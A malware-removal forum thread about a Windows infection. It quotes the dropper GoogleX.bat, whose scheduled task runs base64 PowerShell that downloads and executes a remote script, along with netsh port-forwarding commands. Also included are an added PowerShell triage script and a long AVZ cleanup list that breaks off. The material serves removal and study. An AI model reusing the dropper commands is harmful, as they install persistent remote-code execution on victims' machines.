
Dozens of CMD.exe and Task Scheduler processes (request No. 225725)

  #1  Sektor1024 (Junior Member; registered 06.10.2020; 6 posts)

    Hello. I caught a virus that creates dozens of "Task Scheduler" processes, "Windows Command Processor" and "Console Window Host". It constantly generates services whose names are 4 random letters. It creates a file GoogleX.Bat that contains a command, and by all appearances these processes are executing it:
    Code:
    REM Contents of GoogleX.bat as posted (forum line-wrapping removed). The base64 after -e
    REM is UTF-16LE and decodes to:
    REM IEX (New-Object Net.WebClient).downloadstring('http://bing.protopower.icu/cok9.js')
    schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "AutFree" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYgBpAG4AZwAuAHAAcgBvAHQAbwBwAG8AdwBlAHIALgBpAGMAdQAvAGMAbwBrADkALgBqAHMAJwApAA=="
    netsh interface ipv6 install
    netsh firewall add portopening tcp 65532 DNS2
    netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53
    netsh firewall add portopening tcp 65531 DNSS2
    netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53

    Antivirus programs refuse to install and show an error. Scanners find nothing criminal.
    Attachments: images
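The post above describes four persistence and network indicators: a scheduled task that runs base64-encoded PowerShell as SYSTEM, services with random 4-letter names, portproxy mappings plus firewall openings on 65531/65532, and the dropper C:\Windows\Temp\GoogleX.bat. The following triage script is an added example and is not code from the thread or from VirusInfo; it decodes the task payload the same way the REM comment above does, lists candidate services and mappings, and writes a cleanup script in the StopService/DeleteService form the helper later uses. The allowlist of legitimate 4-letter Windows services, the output file name and the Windows 8+/Server 2012+ requirement for Get-ScheduledTask are assumptions; review everything it flags before running any cleanup.

```powershell
# Added triage example (not from the VirusInfo thread). Run in an elevated PowerShell.
#Requires -RunAsAdministrator

# 1. Scheduled tasks whose action passes -e / -enc / -EncodedCommand to PowerShell.
#    schtasks-encoded commands are base64 over UTF-16LE, hence the Unicode decode.
function Get-EncodedTaskPayload {
    foreach ($task in Get-ScheduledTask) {
        foreach ($action in $task.Actions) {
            $argString = [string]$action.Arguments          # null for non-Exec actions
            if ($argString -match '(?i)-e(nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)') {
                try { $decoded = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[2])) }
                catch { $decoded = '<not valid base64>' }
                [pscustomobject]@{
                    TaskName = $task.TaskName
                    RunAs    = $task.Principal.UserId
                    Execute  = $action.Execute
                    Decoded  = $decoded
                }
            }
        }
    }
}

# 2. Services whose name is exactly four letters (the pattern reported in the post).
#    Assumed allowlist of built-in 4-letter services; everything else is a candidate,
#    and PathName is included so the analyst can judge it.
$KnownFourLetter = @('BITS', 'Dhcp', 'SENS')
function Get-FourLetterService {
    Get-CimInstance Win32_Service |
        Where-Object { $_.Name -cmatch '^[A-Za-z]{4}$' -and $_.Name -notin $KnownFourLetter } |
        Select-Object Name, DisplayName, State, StartMode, PathName
}

# 3. netsh portproxy v4tov4 mappings live in the registry as values named
#    "listenaddress/listenport" whose data is "connectaddress/connectport"
#    (the post's sample maps 65531 and 65532 to 1.1.1.1/53).
function Get-PortProxyMapping {
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp'
    if (-not (Test-Path $key)) { return }
    (Get-ItemProperty $key).PSObject.Properties |
        Where-Object { $_.Name -match '^[^/]+/\d+$' } |
        ForEach-Object { [pscustomobject]@{ Listen = $_.Name; ConnectTo = $_.Value } }
}

# 4. Firewall rules that open the two listen ports (netsh firewall add portopening).
function Get-SuspiciousFirewallRule {
    Get-NetFirewallPortFilter |
        Where-Object { $_.LocalPort -match '^6553[12]$' } |
        Get-NetFirewallRule |
        Select-Object DisplayName, Enabled, Direction, Action
}

# 5. The dropper named in the post.
function Get-DropperFile {
    $path = 'C:\Windows\Temp\GoogleX.bat'
    if (Test-Path $path) { Get-Item $path | Select-Object FullName, Length, CreationTime, LastWriteTime }
}

# 6. Emit an AVZ script in the same shape the helper's reply uses (StopService for each
#    flagged service, quarantine + delete the dropper, then DeleteService) for manual review.
function New-AvzCleanupScript {
    param([string[]]$ServiceNames, [string]$OutFile = "$env:TEMP\cleanup_avz.txt")   # assumed path
    $lines  = @('begin')
    $lines += $ServiceNames | ForEach-Object { " StopService('$_');" }
    $lines += " QuarantineFile('c:\windows\temp\GoogleX.bat', '');"
    $lines += " DeleteFile('c:\windows\temp\GoogleX.bat', '');"
    $lines += $ServiceNames | ForEach-Object { " DeleteService('$_');" }
    $lines += 'end.'
    Set-Content -Path $OutFile -Value $lines -Encoding ASCII
    $OutFile
}

Write-Host '== Scheduled tasks with encoded PowerShell =='; Get-EncodedTaskPayload | Format-List | Out-Host
Write-Host '== Candidate 4-letter services ==';             $svc = Get-FourLetterService; $svc | Format-Table -AutoSize | Out-Host
Write-Host '== portproxy mappings ==';                      Get-PortProxyMapping | Format-Table -AutoSize | Out-Host
Write-Host '== Firewall rules on 65531/65532 ==';           Get-SuspiciousFirewallRule | Format-Table -AutoSize | Out-Host
Write-Host '== Dropper ==';                                 Get-DropperFile | Format-List | Out-Host
if ($svc) { Write-Host ('AVZ cleanup script written for review: ' + (New-AvzCleanupScript -ServiceNames @($svc.Name))) }
```

The task decoder matches "-e" only when whitespace follows it, so "-ep bypass" is skipped and the real "-e <base64>" argument is picked up. Parsing the PortProxy registry key rather than netsh output avoids locale-dependent text. The generated AVZ script is written to a file rather than executed, because a few legitimate services also have 4-letter names and the flagged list needs a human look first.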


  #2  Info_bot (Cyber; registered 11.05.2011; 2,306 posts)
    Dear Sektor1024, thank you for contacting our forum!

    Virus removal is a completely free service on VirusInfo.Info. Helpers will answer your request as soon as possible. To receive help you need to provide scan logs from the Autologger utility; details are in the rules for submitting a help request.

    Information

    If you want personal, guaranteed help in priority mode, use the paid service Помогите+.

    If our site proves useful to you and you have the opportunity, please support the project.

  #3  Senior Helper (registered 06.05.2008; Tula; 31,789 posts)
    Run the following script in AVZ from the Autologger folder:
    Code:
    begin
     ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
     StopService('aaGS');
     StopService('abhi');
     StopService('AfXk');
     StopService('AiHF');
     StopService('aKbx');
     StopService('AluR');
     StopService('AMLL');
     StopService('aMnn');
     StopService('anlA');
     StopService('AodN');
     StopService('AoEv');
     StopService('ApgS');
     StopService('ApIq');
     StopService('aQId');
     StopService('army');
     StopService('ASgL');
     StopService('aSuW');
     StopService('ATMt');
     StopService('aUAH');
     StopService('AWFs');
     StopService('awhz');
     StopService('aWrD');
     StopService('AXsr');
     StopService('AYJQ');
     StopService('AZoa');
     StopService('bdTX');
     StopService('bJIK');
     StopService('bjyh');
     StopService('bLid');
     StopService('bOYn');
     StopService('bPnS');
     StopService('bPSb');
     StopService('BpvX');
     StopService('Bqop');
     StopService('BqZN');
     StopService('bRhy');
     StopService('brtW');
     StopService('BSSb');
     StopService('bVVw');
     StopService('ByWd');
     StopService('bZfs');
     StopService('CbsO');
     StopService('ccaJ');
     StopService('ccdW');
     StopService('CCHJ');
     StopService('Cdaf');
     StopService('CgpH');
     StopService('ciLP');
     StopService('CLyY');
     StopService('cmJv');
     StopService('CmyH');
     StopService('CNVY');
     StopService('CnYl');
     StopService('CnzB');
     StopService('CpWd');
     StopService('CqPu');
     StopService('CrdT');
     StopService('CruK');
     StopService('CSuu');
     StopService('cUie');
     StopService('CUKf');
     StopService('cUvn');
     StopService('cvdk');
     StopService('CvFa');
     StopService('Cyef');
     StopService('daGU');
     StopService('DbQc');
     StopService('dCBE');
     StopService('DEeF');
     StopService('dfQL');
     StopService('dgTr');
     StopService('dJEm');
     StopService('dMRf');
     StopService('dMud');
     StopService('dnaO');
     StopService('DNLQ');
     StopService('dOgh');
     StopService('dOxq');
     StopService('dqms');
     StopService('drGy');
     StopService('DSuL');
     StopService('dsxT');
     StopService('DToV');
     StopService('DUKy');
     StopService('dvhw');
     StopService('DVwM');
     StopService('DXtq');
     StopService('DYHo');
     StopService('dYxz');
     StopService('DzYS');
     StopService('eaBy');
     StopService('eanf');
     StopService('eauE');
     StopService('eDBD');
     StopService('edKt');
     StopService('eEGw');
     StopService('EErn');
     StopService('EETJ');
     StopService('eJbm');
     StopService('Ejrw');
     StopService('EKlk');
     StopService('eKwt');
     StopService('ELlH');
     StopService('EnNh');
     StopService('EPqC');
     StopService('eQhK');
     StopService('erkp');
     StopService('ErUr');
     StopService('EsTA');
     StopService('eTCg');
     StopService('etgs');
     StopService('eVfc');
     StopService('EXQe');
     StopService('FAfG');
     StopService('faOh');
     StopService('fcqb');
     StopService('FCWt');
     StopService('fdwL');
     StopService('fECN');
     StopService('feuu');
     StopService('FGdo');
     StopService('FgXh');
     StopService('FHtx');
     StopService('fhZm');
     StopService('fkjU');
     StopService('FLOl');
     StopService('FlvH');
     StopService('FnvT');
     StopService('FPqr');
     StopService('FqDp');
     StopService('fsIg');
     StopService('fuNe');
     StopService('fVXn');
     StopService('FXbR');
     StopService('FxnN');
     StopService('FxRL');
     StopService('fXvk');
     StopService('fYAD');
     StopService('fYtH');
     StopService('Fzbw');
     StopService('FZft');
     StopService('gbXm');
     StopService('GdCY');
     StopService('gEry');
     StopService('GFZM');
     StopService('GkPO');
     StopService('GKVc');
     StopService('glaJ');
     StopService('gmOp');
     StopService('GPSj');
     StopService('gUwB');
     StopService('GvYI');
     StopService('GXEA');
     StopService('GZHC');
     StopService('haev');
     StopService('Hcah');
     StopService('hcID');
     StopService('HDPq');
     StopService('hENs');
     StopService('Heta');
     StopService('HeTf');
     StopService('HHEC');
     StopService('HhGq');
     StopService('hipZ');
     StopService('hknS');
     StopService('HliD');
     StopService('hpNe');
     StopService('hpzc');
     StopService('hQxv');
     StopService('HrNd');
     StopService('hsfS');
     StopService('huNG');
     StopService('HuvD');
     StopService('hVuE');
     StopService('hvWs');
     StopService('HwHQ');
     StopService('HXjz');
     StopService('HXsR');
     StopService('hyvJ');
     StopService('IBxf');
     StopService('iEht');
     StopService('iFNK');
     StopService('IFVq');
     StopService('IhEt');
     StopService('ihxQ');
     StopService('iiBY');
     StopService('iImB');
     StopService('IiTq');
     StopService('iKeo');
     StopService('iLIa');
     StopService('imDQ');
     StopService('imhK');
     StopService('iOIH');
     StopService('IRZc');
     StopService('iSwW');
     StopService('ivjk');
     StopService('IwTh');
     StopService('iWwc');
     StopService('IxeJ');
     StopService('ixjF');
     StopService('Ixlz');
     StopService('iZdL');
     StopService('iZUP');
     StopService('JajD');
     StopService('JCml');
     StopService('jDwb');
     StopService('jFsb');
     StopService('JgOM');
     StopService('jjJf');
     StopService('jjTS');
     StopService('jKXj');
     StopService('Jluh');
     StopService('JOcr');
     StopService('jOsJ');
     StopService('Jskx');
     StopService('JSRR');
     StopService('JTbt');
     StopService('jTKT');
     StopService('jTzP');
     StopService('jurW');
     StopService('jwJR');
     StopService('JWNA');
     StopService('kCKF');
     StopService('kCmz');
     StopService('kCqQ');
     StopService('KCrA');
     StopService('KDel');
     StopService('keGN');
     StopService('kEME');
     StopService('kEwI');
     StopService('kfxL');
     StopService('KHfP');
     StopService('KIen');
     StopService('kIpb');
     StopService('KKMs');
     StopService('kKnI');
     StopService('kkYc');
     StopService('klpE');
     StopService('kMTb');
     StopService('KnAx');
     StopService('kNUe');
     StopService('koac');
     StopService('KPtb');
     StopService('KpuR');
     StopService('kqQB');
     StopService('Kqwc');
     StopService('ksbY');
     StopService('kSLU');
     StopService('KTxG');
     StopService('kWAU');
     StopService('KyDA');
     StopService('lBcq');
     StopService('lbhH');
     StopService('LBSq');
     StopService('LcYH');
     StopService('lExx');
     StopService('LfdN');
     StopService('LfmD');
     StopService('LHPt');
     StopService('ljLy');
     StopService('lJQO');
     StopService('lLBF');
     StopService('llHG');
     StopService('LmCX');
     StopService('Lmfp');
     StopService('lnlv');
     StopService('LpFr');
     StopService('lqXl');
     StopService('LsGh');
     StopService('luYu');
     StopService('LxyS');
     StopService('LYIT');
     StopService('MAdV');
     StopService('MApA');
     StopService('mboN');
     StopService('mBtp');
     StopService('mdln');
     StopService('mdOa');
     StopService('mEJO');
     StopService('MEqK');
     StopService('mIgD');
     StopService('MISt');
     StopService('miws');
     StopService('Mllq');
     StopService('mnCH');
     StopService('Mnwl');
     StopService('mPCz');
     StopService('mPMn');
     StopService('msVb');
     StopService('MtYD');
     StopService('MuZK');
     StopService('MwkE');
     StopService('mwnU');
     StopService('MxTx');
     StopService('MyGt');
     StopService('nACK');
     StopService('nBbw');
     StopService('NbNG');
     StopService('NCbh');
     StopService('nDBY');
     StopService('NdJT');
     StopService('ndQI');
     StopService('NDyU');
     StopService('ngWs');
     StopService('nINZ');
     StopService('NJCe');
     StopService('NjcY');
     StopService('Njzo');
     StopService('nkiR');
     StopService('Nliw');
     StopService('Nmvc');
     StopService('NnGs');
     StopService('NnWW');
     StopService('nOax');
     StopService('NrpX');
     StopService('NrYe');
     StopService('nSoD');
     StopService('ntht');
     StopService('nTmt');
     StopService('nUFG');
     StopService('nUHk');
     StopService('nVRd');
     StopService('Nvyh');
     StopService('NwdO');
     StopService('nwzT');
     StopService('nyCA');
     StopService('nydA');
     StopService('nYKV');
     StopService('oAcs');
     StopService('oCRl');
     StopService('OdEK');
     StopService('oFch');
     StopService('OFGo');
     StopService('OfJd');
     StopService('OGtC');
     StopService('ohar');
     StopService('OiAQ');
     StopService('OIkr');
     StopService('OiyO');
     StopService('oLxG');
     StopService('OLYt');
     StopService('ombA');
     StopService('omoH');
     StopService('omSu');
     StopService('ooUT');
     StopService('oqof');
     StopService('ORCS');
     StopService('OuXn');
     StopService('ovcw');
     StopService('OVFd');
     StopService('oVjD');
     StopService('ovQM');
     StopService('oWnN');
     StopService('OXNY');
     StopService('OxoE');
     StopService('oZAh');
     StopService('OZbK');
     StopService('OzOi');
     StopService('OzUG');
     StopService('PbfR');
     StopService('PcAX');
     StopService('PccC');
     StopService('peHY');
     StopService('PFvs');
     StopService('pGhj');
     StopService('PGIt');
     StopService('PgMn');
     StopService('PIrR');
     StopService('pitq');
     StopService('pItx');
     StopService('pkwS');
     StopService('PMEC');
     StopService('pmQJ');
     StopService('pOlN');
     StopService('POpy');
     StopService('poXB');
     StopService('PoZJ');
     StopService('PPpT');
     StopService('PqJc');
     StopService('pQVR');
     StopService('PRfy');
     StopService('PrPv');
     StopService('Prvw');
     StopService('PsTK');
     StopService('PtRI');
     StopService('PuEG');
     StopService('puIW');
     StopService('PUNt');
     StopService('PuoC');
     StopService('pUtY');
     StopService('PXDw');
     StopService('pxMg');
     StopService('PXqm');
     StopService('pXxd');
     StopService('PXYC');
     StopService('pYXX');
     StopService('PztL');
     StopService('QBdh');
     StopService('qbDu');
     StopService('QbNP');
     StopService('qewt');
     StopService('qgBR');
     StopService('Qhnc');
     StopService('QJnR');
     StopService('QjYy');
     StopService('qkXT');
     StopService('qMfS');
     StopService('qNTu');
     StopService('Qotq');
     StopService('qpTo');
     StopService('qRiZ');
     StopService('QtkM');
     StopService('QuNS');
     StopService('QuUV');
     StopService('QuVC');
     StopService('Qvgl');
     StopService('QvLR');
     StopService('QWFk');
     StopService('QwPN');
     StopService('Qxtv');
     StopService('RAAG');
     StopService('RaGL');
     StopService('rAOS');
     StopService('raTM');
     StopService('RbHP');
     StopService('RcDa');
     StopService('RCHO');
     StopService('rDTA');
     StopService('REPJ');
     StopService('rhdk');
     StopService('Rjbg');
     StopService('rlAo');
     StopService('rLqN');
     StopService('roDW');
     StopService('ROmf');
     StopService('rOWm');
     StopService('Rqgj');
     StopService('RQqP');
     StopService('rQYY');
     StopService('rrvD');
     StopService('rtCg');
     StopService('RTMu');
     StopService('rUdN');
     StopService('rveN');
     StopService('rVfG');
     StopService('rvlX');
     StopService('rVsf');
     StopService('RWeb');
     StopService('RwGR');
     StopService('RxCt');
     StopService('RxOL');
     StopService('Rxuj');
     StopService('RZgQ');
     StopService('rzit');
     StopService('RZLi');
     StopService('SANL');
     StopService('SAtS');
     StopService('sAyi');
     StopService('SCcg');
     StopService('sdcn');
     StopService('sDOl');
     StopService('SEnc');
     StopService('SERm');
     StopService('SHiS');
     StopService('shsz');
     StopService('sJKj');
     StopService('sjoT');
     StopService('SmeQ');
     StopService('SmIB');
     StopService('SnBQ');
     StopService('snbZ');
     StopService('sNiO');
     StopService('SoFh');
     StopService('spaX');
     StopService('Spmp');
     StopService('SPOm');
     StopService('SRaD');
     StopService('SRZG');
     StopService('sRzz');
     StopService('suHV');
     StopService('sUKn');
     StopService('SvEO');
     StopService('SVhp');
     StopService('sVqh');
     StopService('SwWe');
     StopService('SXnK');
     StopService('SZAu');
     StopService('tArC');
     StopService('teAq');
     StopService('TeZi');
     StopService('tfia');
     StopService('TfkV');
     StopService('tfsh');
     StopService('thCj');
     StopService('thgP');
     StopService('tivm');
     StopService('TIyM');
     StopService('TkbM');
     StopService('tKnj');
     StopService('TMkz');
     StopService('Toif');
     StopService('TQMU');
     StopService('ttXX');
     StopService('TurV');
     StopService('tvym');
     StopService('TWfY');
     StopService('TwqB');
     StopService('TWzz');
     StopService('TXcs');
     StopService('Tzov');
     StopService('uCMV');
     StopService('uEhY');
     StopService('UEjH');
     StopService('UGmp');
     StopService('UhZf');
     StopService('uiMw');
     StopService('UiOZ');
     StopService('UiRW');
     StopService('uIZB');
     StopService('UJdZ');
     StopService('ulhy');
     StopService('uLqf');
     StopService('UmhJ');
     StopService('umIz');
     StopService('uMrz');
     StopService('uNsj');
     StopService('uNXN');
     StopService('uoae');
     StopService('UoFS');
     StopService('uoLx');
     StopService('UOZp');
     StopService('UQSR');
     StopService('utUh');
     StopService('uxNA');
     StopService('uYpc');
     StopService('ValP');
     StopService('VAMF');
     StopService('vaVc');
     StopService('VBLM');
     StopService('Vdff');
     StopService('vDjA');
     StopService('vDQv');
     StopService('vEYK');
     StopService('VHTa');
     StopService('VihC');
     StopService('vjdm');
     StopService('vJfb');
     StopService('Vkms');
     StopService('vlbs');
     StopService('VMPf');
     StopService('vMRy');
     StopService('voom');
     StopService('VQgW');
     StopService('vrBj');
     StopService('VSRa');
     StopService('vsrh');
     StopService('VTwz');
     StopService('vUri');
     StopService('vvdG');
     StopService('vvdJ');
     StopService('vwxi');
     StopService('VYSq');
     StopService('WAGy');
     StopService('wAua');
     StopService('WbEi');
     StopService('WbOw');
     StopService('WCfP');
     StopService('wCIG');
     StopService('Wdhm');
     StopService('wDVc');
     StopService('WfxE');
     StopService('wFxP');
     StopService('wgBd');
     StopService('Wjwz');
     StopService('wkDx');
     StopService('WlCO');
     StopService('wmHm');
     StopService('wMrw');
     StopService('wonm');
     StopService('wpRK');
     StopService('WSEe');
     StopService('wtgX');
     StopService('WTzV');
     StopService('WuLQ');
     StopService('wUwV');
     StopService('WVel');
     StopService('WWvD');
     StopService('WxTn');
     StopService('wXUF');
     StopService('wXWl');
     StopService('wZtm');
     StopService('XaLt');
     StopService('XBcg');
     StopService('XDTO');
     StopService('xEtp');
     StopService('XeXx');
     StopService('xFnh');
     StopService('xgga');
     StopService('xhJw');
     StopService('xHUx');
     StopService('XJki');
     StopService('XkTx');
     StopService('Xliw');
     StopService('XmzQ');
     StopService('xnwl');
     StopService('XpiQ');
     StopService('XpLJ');
     StopService('xqsn');
     StopService('XraU');
     StopService('XtcV');
     StopService('xTOk');
     StopService('XVwL');
     StopService('xWaV');
     StopService('XWbd');
     StopService('xWEf');
     StopService('XYUK');
     StopService('xzcJ');
     StopService('YbBJ');
     StopService('ybyQ');
     StopService('YCGT');
     StopService('YcTA');
     StopService('yFMa');
     StopService('yfsF');
     StopService('YFuB');
     StopService('ygbC');
     StopService('YGHG');
     StopService('YgYt');
     StopService('yJth');
     StopService('yKBO');
     StopService('ykmR');
     StopService('YLyz');
     StopService('yOod');
     StopService('yOsz');
     StopService('YrfH');
     StopService('ytRT');
     StopService('YtSQ');
     StopService('YwAz');
     StopService('YWsT');
     StopService('zAqY');
     StopService('zbdb');
     StopService('zDVX');
     StopService('zehI');
     StopService('zgCj');
     StopService('zNHc');
     StopService('ZOxu');
     StopService('ZQDg');
     StopService('zrFb');
     StopService('ZShG');
     StopService('zSnC');
     StopService('ZuAs');
     StopService('ZUIe');
     StopService('ZWTd');
     StopService('zWTe');
     StopService('zYpO');
     StopService('ZZmI');
     StopService('ZZQG');
     QuarantineFile('C:\Program Files\rdp wrapper\rdpwrap.dll', '');
     QuarantineFile('c:\windows\temp\GoogleX.bat', '');
     DeleteFile('>>c:\windows\temp\GoogleX.bat&cmd.exe', '64');
     DeleteFile('C:\Program Files\rdp wrapper\rdpwrap.dll', '');
     DeleteService('aaGS');
     DeleteService('abhi');
     DeleteService('AfXk');
     DeleteService('AiHF');
     DeleteService('aKbx');
     DeleteService('AluR');
     DeleteService('AMLL');
     DeleteService('aMnn');
     DeleteService('anlA');
     DeleteService('AodN');
     DeleteService('AoEv');
     DeleteService('ApgS');
     DeleteService('ApIq');
     DeleteService('aQId');
     DeleteService('army');
     DeleteService('ASgL');
     DeleteService('aSuW');
     DeleteService('ATMt');
     DeleteService('aUAH');
     DeleteService('AWFs');
     DeleteService('awhz');
     DeleteService('aWrD');
     DeleteService('AXsr');
     DeleteService('AYJQ');
     DeleteService('AZoa');
     DeleteService('bdTX');
     DeleteService('bJIK');
     DeleteService('bjyh');
     DeleteService('bLid');
     DeleteService('bOYn');
     DeleteService('bPnS');
     DeleteService('bPSb');
     DeleteService('BpvX');
     DeleteService('Bqop');
     DeleteService('BqZN');
     DeleteService('bRhy');
     DeleteService('brtW');
     DeleteService('BSSb');
     DeleteService('bVVw');
     DeleteService('ByWd');
     DeleteService('bZfs');
     DeleteService('CbsO');
     DeleteService('ccaJ');
     DeleteService('ccdW');
     DeleteService('CCHJ');
     DeleteService('Cdaf');
     DeleteService('CgpH');
     DeleteService('ciLP');
     DeleteService('CLyY');
     DeleteService('cmJv');
     DeleteService('CmyH');
     DeleteService('CNVY');
     DeleteService('CnYl');
     DeleteService('CnzB');
     DeleteService('CpWd');
     DeleteService('CqPu');
     DeleteService('CrdT');
     DeleteService('CruK');
     DeleteService('CSuu');
     DeleteService('cUie');
     DeleteService('CUKf');
     DeleteService('cUvn');
     DeleteService('cvdk');
     DeleteService('CvFa');
     DeleteService('Cyef');
     DeleteService('daGU');
     DeleteService('DbQc');
     DeleteService('dCBE');
     DeleteService('DEeF');
     DeleteService('dfQL');
     DeleteService('dgTr');
     DeleteService('dJEm');
     DeleteService('dMRf');
     DeleteService('dMud');
     DeleteService('dnaO');
     DeleteService('DNLQ');
     DeleteService('dOgh');
     DeleteService('dOxq');
     DeleteService('dqms');
     DeleteService('drGy');
     DeleteService('DSuL');
     DeleteService('dsxT');
     DeleteService('DToV');
     DeleteService('DUKy');
     DeleteService('dvhw');
     DeleteService('DVwM');
     DeleteService('DXtq');
     DeleteService('DYHo');
     DeleteService('dYxz');
     DeleteService('DzYS');
     DeleteService('eaBy');
     DeleteService('eanf');
     DeleteService('eauE');
     DeleteService('eDBD');
     DeleteService('edKt');
     DeleteService('eEGw');
     DeleteService('EErn');
     DeleteService('EETJ');
     DeleteService('eJbm');
     DeleteService('Ejrw');
     DeleteService('EKlk');
     DeleteService('eKwt');
     DeleteService('ELlH');
     DeleteService('EnNh');
     DeleteService('EPqC');
     DeleteService('eQhK');
     DeleteService('erkp');
     DeleteService('ErUr');
     DeleteService('EsTA');
     DeleteService('eTCg');
     DeleteService('etgs');
     DeleteService('eVfc');
     DeleteService('EXQe');
     DeleteService('FAfG');
     DeleteService('faOh');
     DeleteService('fcqb');
     DeleteService('FCWt');
     DeleteService('fdwL');
     DeleteService('fECN');
     DeleteService('feuu');
     DeleteService('FGdo');
     DeleteService('FgXh');
     DeleteService('FHtx');
     DeleteService('fhZm');
     DeleteService('fkjU');
     DeleteService('FLOl');
     DeleteService('FlvH');
     DeleteService('FnvT');
     DeleteService('FPqr');
     DeleteService('FqDp');
     DeleteService('fsIg');
     DeleteService('fuNe');
     DeleteService('fVXn');
     DeleteService('FXbR');
     DeleteService('FxnN');
     DeleteService('FxRL');
     DeleteService('fXvk');
     DeleteService('fYAD');
     DeleteService('fYtH');
     DeleteService('Fzbw');
     DeleteService('FZft');
     DeleteService('gbXm');
     DeleteService('GdCY');
     DeleteService('gEry');
     DeleteService('GFZM');
     DeleteService('GkPO');
     DeleteService('GKVc');
     DeleteService('glaJ');
     DeleteService('gmOp');
     DeleteService('GPSj');
     DeleteService('gUwB');
     DeleteService('GvYI');
     DeleteService('GXEA');
     DeleteService('GZHC');
     DeleteService('haev');
     DeleteService('Hcah');
     DeleteService('hcID');
     DeleteService('HDPq');
     DeleteService('hENs');
     DeleteService('Heta');
     DeleteService('HeTf');
     DeleteService('HHEC');
     DeleteService('HhGq');
     DeleteService('hipZ');
     DeleteService('hknS');
     DeleteService('HliD');
     DeleteService('hpNe');
     DeleteService('hpzc');
     DeleteService('hQxv');
     DeleteService('HrNd');
     DeleteService('hsfS');
     DeleteService('huNG');
     DeleteService('HuvD');
     DeleteService('hVuE');
     DeleteService('hvWs');
     DeleteService('HwHQ');
     DeleteService('HXjz');
     DeleteService('HXsR');
     DeleteService('hyvJ');
     DeleteService('IBxf');
     DeleteService('iEht');
     DeleteService('iFNK');
     DeleteService('IFVq');
     DeleteService('IhEt');
     DeleteService('ihxQ');
     DeleteService('iiBY');
     DeleteService('iImB');
     DeleteService('IiTq');
     DeleteService('iKeo');
     DeleteService('iLIa');
     DeleteService('imDQ');
     DeleteService('imhK');
     DeleteService('iOIH');
     DeleteService('IRZc');
     DeleteService('iSwW');
     DeleteService('ivjk');
     DeleteService('IwTh');
     DeleteService('iWwc');
     DeleteService('IxeJ');
     DeleteService('ixjF');
     DeleteService('Ixlz');
     DeleteService('iZdL');
     DeleteService('iZUP');
     DeleteService('JajD');
     DeleteService('JCml');
     DeleteService('jDwb');
     DeleteService('jFsb');
     DeleteService('JgOM');
     DeleteService('jjJf');
     DeleteService('jjTS');
     DeleteService('jKXj');
     DeleteService('Jluh');
     DeleteService('JOcr');
     DeleteService('jOsJ');
     DeleteService('Jskx');
     DeleteService('JSRR');
     DeleteService('JTbt');
     DeleteService('jTKT');
     DeleteService('jTzP');
     DeleteService('jurW');
     DeleteService('jwJR');
     DeleteService('JWNA');
     DeleteService('kCKF');
     DeleteService('kCmz');
     DeleteService('kCqQ');
     DeleteService('KCrA');
     DeleteService('KDel');
     DeleteService('keGN');
     DeleteService('kEME');
     DeleteService('kEwI');
     DeleteService('kfxL');
     DeleteService('KHfP');
     DeleteService('KIen');
     DeleteService('kIpb');
     DeleteService('KKMs');
     DeleteService('kKnI');
     DeleteService('kkYc');
     DeleteService('klpE');
     DeleteService('kMTb');
     DeleteService('KnAx');
     DeleteService('kNUe');
     DeleteService('koac');
     DeleteService('KPtb');
     DeleteService('KpuR');
     DeleteService('kqQB');
     DeleteService('Kqwc');
     DeleteService('ksbY');
     DeleteService('kSLU');
     DeleteService('KTxG');
     DeleteService('kWAU');
     DeleteService('KyDA');
     DeleteService('lBcq');
     DeleteService('lbhH');
     DeleteService('LBSq');
     DeleteService('LcYH');
     DeleteService('lExx');
     DeleteService('LfdN');
     DeleteService('LfmD');
     DeleteService('LHPt');
     DeleteService('ljLy');
     DeleteService('lJQO');
     DeleteService('lLBF');
     DeleteService('llHG');
     DeleteService('LmCX');
     DeleteService('Lmfp');
     DeleteService('lnlv');
     DeleteService('LpFr');
     DeleteService('lqXl');
     DeleteService('LsGh');
     DeleteService('luYu');
     DeleteService('LxyS');
     DeleteService('LYIT');
     DeleteService('MAdV');
     DeleteService('MApA');
     DeleteService('mboN');
     DeleteService('mBtp');
     DeleteService('mdln');
     DeleteService('mdOa');
     DeleteService('mEJO');
     DeleteService('MEqK');
     DeleteService('mIgD');
     DeleteService('MISt');
     DeleteService('miws');
     DeleteService('Mllq');
     DeleteService('mnCH');
     DeleteService('Mnwl');
     DeleteService('mPCz');
     DeleteService('mPMn');
     DeleteService('msVb');
     DeleteService('MtYD');
     DeleteService('MuZK');
     DeleteService('MwkE');
     DeleteService('mwnU');
     DeleteService('MxTx');
     DeleteService('MyGt');
     DeleteService('nACK');
     DeleteService('nBbw');
     DeleteService('NbNG');
     DeleteService('NCbh');
     DeleteService('nDBY');
     DeleteService('NdJT');
     DeleteService('ndQI');
     DeleteService('NDyU');
     DeleteService('ngWs');
     DeleteService('nINZ');
     DeleteService('NJCe');
     DeleteService('NjcY');
     DeleteService('Njzo');
     DeleteService('nkiR');
     DeleteService('Nliw');
     DeleteService('Nmvc');
     DeleteService('NnGs');
     DeleteService('NnWW');
     DeleteService('nOax');
     DeleteService('NrpX');
     DeleteService('NrYe');
     DeleteService('nSoD');
     DeleteService('ntht');
     DeleteService('nTmt');
     DeleteService('nUFG');
     DeleteService('nUHk');
     DeleteService('nVRd');
     DeleteService('Nvyh');
     DeleteService('NwdO');
     DeleteService('nwzT');
     DeleteService('nyCA');
     DeleteService('nydA');
     DeleteService('nYKV');
     DeleteService('oAcs');
     DeleteService('oCRl');
     DeleteService('OdEK');
     DeleteService('oFch');
     DeleteService('OFGo');
     DeleteService('OfJd');
     DeleteService('OGtC');
     DeleteService('ohar');
     DeleteService('OiAQ');
     DeleteService('OIkr');
     DeleteService('OiyO');
     DeleteService('oLxG');
     DeleteService('OLYt');
     DeleteService('ombA');
     DeleteService('omoH');
     DeleteService('omSu');
     DeleteService('ooUT');
     DeleteService('oqof');
     DeleteService('ORCS');
     DeleteService('OuXn');
     DeleteService('ovcw');
